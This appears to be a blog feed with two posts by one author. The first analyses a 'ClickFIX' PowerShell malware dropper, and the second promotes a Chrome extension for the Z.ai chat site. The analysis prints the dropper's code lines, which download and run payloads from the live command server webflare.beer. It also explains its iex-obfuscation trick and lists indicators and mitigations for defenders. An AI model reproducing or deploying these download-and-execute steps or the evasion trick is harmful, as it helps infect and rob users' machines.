DEV Community: Yusril Ihsanul Alim The latest articles on DEV Community by Yusril Ihsanul Alim (@mixwz). https://dev.to/mixwz https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2671731%2Fe5c9af22-1180-41a7-8082-d49ccbc7ba15.jpg DEV Community: Yusril Ihsanul Alim https://dev.to/mixwz en ClickFIX Malware Yusril Ihsanul Alim Fri, 22 May 2026 15:50:08 +0000 https://dev.to/mixwz/clickfx-malware-fjc https://dev.to/mixwz/clickfx-malware-fjc <p>Here's the complete breakdown of this malware:</p> <h2> Stage 1: Outer Wrapper (Obfuscation Layer) </h2> <p>The outer script uses three layers of evasion:</p> <ol> <li><p><strong>XOR obfuscation</strong>: The massive hex string (<code>$x24</code>) is XOR-decrypted using the key <code>5JZv8J9xz</code>. Each byte is decoded by converting 2 hex chars to an integer, then XORing with the key character at position <code>(i/2) % key_length</code>.</p></li> <li> <p><strong>Dynamic <code>iex</code> construction</strong>: Instead of writing <code>iex</code> literally, it builds it from the <code>COMSPEC</code> environment variable (<code>C:\Windows\system32\cmd.exe</code>):</p> <ul> <li>Index 4 → <code>W</code> </li> <li>Index 26 → <code>e</code> </li> <li>Index 25 → <code>x</code> </li> <li>Joined → <code>iex</code> (Invoke-Expression)</li> </ul> </li> <li><p><strong>Execution via <code>iex</code></strong>: <code>.($env:ComSpec[4,26,25]-join'') $y25</code> evaluates to <code>iex $y25</code>, executing the decoded payload.</p></li> </ol> <h2> Stage 2: Decoded Payload (Dropper) </h2> <p>The decoded payload (<code>$v7am6e</code>) is a complete malware dropper:</p> <h3> Configuration </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td><code>$g7</code></td> <td> <code>7z</code> (archive extension)</td> </tr> <tr> <td><code>$h8</code></td> <td> <code>2026</code> (password for the archive)</td> </tr> </tbody> </table></div> <h3> Execution Flow </h3> <p><strong>Step 1 — Create temp workspace</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="nv">$i9</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Join-Path</span><span class="w"> </span><span class="nv">$</span><span class="nn">env</span><span class="p">:</span><span class="nv">TEMP</span><span class="w"> </span><span class="p">([</span><span class="n">System.IO.Path</span><span class="p">]::</span><span class="n">GetRandomFileName</span><span class="p">())</span><span class="w"> </span><span class="n">New-Item</span><span class="w"> </span><span class="nt">-ItemType</span><span class="w"> </span><span class="nx">Directory</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="nv">$i9</span><span class="w"> </span><span class="nt">-Force</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Out-Null</span><span class="w"> </span></code></pre> </div> <p><strong>Step 2 — Download 7z.exe (decompressor)</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="nv">$j10</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Join-Path</span><span class="w"> </span><span class="nv">$i9</span><span class="w"> </span><span class="p">([</span><span class="n">System.IO.Path</span><span class="p">]::</span><span class="n">GetRandomFileName</span><span class="p">()</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s1">'.exe'</span><span class="p">)</span><span class="w"> </span><span class="n">Invoke-WebRequest</span><span class="w"> </span><span class="nt">-Uri</span><span class="w"> </span><span class="s1">'https://webflare.beer/api/7z.exe'</span><span class="w"> </span><span class="nt">-OutFile</span><span class="w"> </span><span class="nv">$j10</span><span class="w"> </span></code></pre> </div> <p>Downloads a legitimate <strong>7-Zip</strong> binary from the C2 server at <code>webflare.beer</code>.</p> <p><strong>Step 3 — Download encrypted payload</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="nv">$k11</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Join-Path</span><span class="w"> </span><span class="nv">$i9</span><span class="w"> </span><span class="p">([</span><span class="n">System.IO.Path</span><span class="p">]::</span><span class="n">GetRandomFileName</span><span class="p">()</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s1">'.'</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nv">$g7</span><span class="p">)</span><span class="w"> </span><span class="n">Invoke-WebRequest</span><span class="w"> </span><span class="nt">-Uri</span><span class="w"> </span><span class="s1">'https://webflare.beer/api/index.php?a=dl&amp;token=...'</span><span class="w"> </span><span class="nt">-OutFile</span><span class="w"> </span><span class="nv">$k11</span><span class="w"> </span></code></pre> </div> <p>Downloads a password-protected <strong>7z archive</strong> from the C2. The request mimics a reCAPTCHA callback with a fake referrer (<code>mdwaktual.com</code>). Retries up to 3 times with 2-second delays if it fails.</p> <p><strong>Step 4 — Extract with 7z</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="nv">$o15</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">@(</span><span class="s1">'x'</span><span class="p">,</span><span class="w"> </span><span class="s1">'-y'</span><span class="p">,</span><span class="w"> </span><span class="s1">'-p2026'</span><span class="p">,</span><span class="w"> </span><span class="s1">'-o'</span><span class="w"> </span><span class="err">+</span><span class="w"> </span><span class="nv">$n14</span><span class="p">,</span><span class="w"> </span><span class="nv">$k11</span><span class="p">)</span><span class="w"> </span><span class="o">&amp;</span><span class="w"> </span><span class="nv">$j10</span><span class="w"> </span><span class="err">@</span><span class="n">o15</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Out-Null</span><span class="w"> </span></code></pre> </div> <p>Extracts the archive using 7-Zip with password <code>2026</code>. If 7z.exe failed to download, it falls back to executing the archive directly.</p> <p><strong>Step 5 — Execute the final payload</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="nv">$p16</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Get-ChildItem</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="nv">$n14</span><span class="w"> </span><span class="nt">-Filter</span><span class="w"> </span><span class="o">*.</span><span class="nf">exe</span><span class="w"> </span><span class="nt">-Recurse</span><span class="w"> </span><span class="nt">-File</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nt">-First</span><span class="w"> </span><span class="nx">1</span><span class="w"> </span><span class="nv">$q17</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Get-ChildItem</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="nv">$n14</span><span class="w"> </span><span class="nt">-Filter</span><span class="w"> </span><span class="o">*.</span><span class="nf">msi</span><span class="w"> </span><span class="nt">-Recurse</span><span class="w"> </span><span class="nt">-File</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nt">-First</span><span class="w"> </span><span class="nx">1</span><span class="w"> </span></code></pre> </div> <p>It looks for either a <code>.exe</code> or <code>.msi</code> file inside the extracted archive, then executes it with <code>Start-Process -WindowStyle Hidden</code>.</p> <p><strong>Step 6 — Cleanup</strong>: Deletes the downloaded 7z archive and 7z.exe.</p> <h2> Stage 3: Final Stage </h2> <p>This is launched as a <strong>new hidden PowerShell process</strong>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Start-Process</span><span class="w"> </span><span class="nt">-WindowStyle</span><span class="w"> </span><span class="nx">Hidden</span><span class="w"> </span><span class="nx">powershell</span><span class="w"> </span><span class="nt">-ArgumentList</span><span class="w"> </span><span class="s1">'-NoProfile'</span><span class="p">,</span><span class="s1">'-WindowStyle'</span><span class="p">,</span><span class="s1">'Hidden'</span><span class="p">,</span><span class="s1">'-Command'</span><span class="p">,</span><span class="nv">$v7am6e</span><span class="w"> </span></code></pre> </div> <p>The final payload hosted at <code>webflare.beer</code> is unknown (encrypted archive not available), but based on the download infrastructure it's likely:</p> <ul> <li> <strong>AsyncRAT</strong>, <strong>AgentTesla</strong>, <strong>RedLine Stealer</strong>, or similar infostealer/RAT</li> <li>The reCAPTCHA-mimicking URI with <code>cb=chrome&amp;ref=https://mdwaktual.com</code> suggests it targets credential harvesting via fake browser update / captcha themes</li> </ul> <h2> IOCs (Indicators of Compromise) </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Type</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>C2 Domain</td> <td><code>webflare.beer</code></td> </tr> <tr> <td>Download URL 1</td> <td><code>https://webflare.beer/api/7z.exe</code></td> </tr> <tr> <td>Download URL 2</td> <td><code>https://webflare.beer/api/index.php?a=dl&amp;token=d123a6194156eab57f412223d4a8add891e6952bc1bcc89eea3cbf411b9da042&amp;src=recaptcha&amp;cb=chrome&amp;ref=https://mdwaktual.com/&amp;mode=recaptcha</code></td> </tr> <tr> <td>Archive Password</td> <td><code>2026</code></td> </tr> <tr> <td>Temp Directory Pattern</td> <td>Randomly-named folder in <code>%TEMP%</code> </td> </tr> <tr> <td>7z.exe hash</td> <td>Unknown (fetched live from C2)</td> </tr> <tr> <td>Referrer spoof</td> <td><code>mdwaktual.com</code></td> </tr> </tbody> </table></div> <h2> Mitigation </h2> <ol> <li> <strong>Block</strong> the domain <code>webflare.beer</code> at firewall/DNS level</li> <li> <strong>Block</strong> <code>*.beer</code> TLD if your org doesn't use it</li> <li> <strong>Restrict PowerShell execution</strong> via Constrained Language Mode or AppLocker</li> <li> <strong>Monitor</strong> <code>powershell.exe</code> spawning from another <code>powershell.exe</code> with <code>-WindowStyle Hidden</code> </li> <li> <strong>Check</strong> <code>%TEMP%</code> for randomly-named directories containing <code>7z.exe</code> or <code>.7z</code> files</li> </ol> code cybersecurity infosec security Zenhance The toolkit Z.ai should have shipped with. Yusril Ihsanul Alim Wed, 06 May 2026 13:36:48 +0000 https://dev.to/mixwz/zenhance-the-toolkitzai-should-haveshipped-with-44pd https://dev.to/mixwz/zenhance-the-toolkitzai-should-haveshipped-with-44pd <h1> Zenhance — The Toolkit Z.ai Should Have Shipped With </h1> <p>Z.ai is powerful… but let’s be honest — it’s missing the features that power users actually need.</p> <p>That’s where <strong><a href="https://chromewebstore.google.com/detail/zenhance/piiedokfmfgihfceljpcgcfflcgglmhm" rel="noopener noreferrer">Zenhance</a></strong> comes in</p> <p><a href="https://chromewebstore.google.com/detail/zenhance/piiedokfmfgihfceljpcgcfflcgglmhm" rel="noopener noreferrer">Zenhance</a> injects directly into your Z.ai chat interface and upgrades it in-place.<br> No separate dashboard. No extra tabs. No friction.</p> <p>Everything lives exactly where you already work.</p> <h2> ⚡ What Zenhance Adds </h2> <h3> 📌 Chat Bookmarks </h3> <p>Save any chat session straight to your sidebar.<br> Find it instantly with search, and rename it however you like.</p> <h3> 🧩 Prompt Snippets </h3> <p>Build your own library of reusable prompt templates.<br> One click → instantly inserted into the input box.</p> <h3> 🎭 Personas </h3> <p>Define custom AI personalities and toggle them on/off anytime.</p> <ul> <li>Automatically injected into every message</li> <li>Supports <strong>one-shot mode</strong> for temporary overrides</li> </ul> <h3> 🛡️ Guardrails </h3> <p>Set rules the AI must follow.</p> <ul> <li>Auto-appended to every prompt</li> <li>Stack multiple guardrails</li> <li>One-shot mode for temporary constraints</li> </ul> <h3> 🔍 Context Questions </h3> <p>As you type, Zenhance detects:</p> <ul> <li>Language</li> <li>Topic</li> </ul> <p>Then suggests relevant follow-up questions you can insert with one click.</p> <h3> 📂 Chat Folding </h3> <p>Long AI responses get messy — especially with injected context.</p> <p>Zenhance automatically:</p> <ul> <li>Collapses Persona / Guardrails / Context blocks</li> <li>Keeps your chat clean and readable</li> </ul> <h3> ✏️ Editable Greeting </h3> <p>Click your name in the greeting and personalize it.</p> <p>Saved locally. No account needed.</p> <h3> 👁️ UI Toggle </h3> <p>Hide distractions instantly:</p> <ul> <li>Chat history</li> <li>Ads</li> <li>Template suggestions</li> </ul> <p>Focus only on what matters.</p> <h3> 💾 Backup &amp; Restore </h3> <p>Export everything as a JSON file:</p> <ul> <li>Bookmarks</li> <li>Personas</li> <li>Guardrails</li> <li>Snippets</li> <li>Settings</li> </ul> <p>Import it on any device whenever you want.</p> <h2> 🤔 Why Install Zenhance? </h2> <p>Z.ai works.</p> <p>But it doesn’t give you control over <strong>repeatable workflows</strong>.</p> <p>If you:</p> <ul> <li>Keep copying the same prompt structures</li> <li>Switch between different AI behaviors</li> <li>Lose track of useful chats</li> </ul> <p>Then Zenhance fixes that.</p> <h2> 🔒 Philosophy </h2> <ul> <li>Everything is <strong>local</strong> </li> <li>Everything is <strong>optional</strong> </li> <li>Nothing touches your data without your action</li> </ul> <h2> 🚀 Final Thought </h2> <p>Z.ai gives you intelligence.<br> <strong><a href="https://chromewebstore.google.com/detail/zenhance/piiedokfmfgihfceljpcgcfflcgglmhm" rel="noopener noreferrer">Zenhance</a> gives you control.</strong></p> ai productivity showdev tooling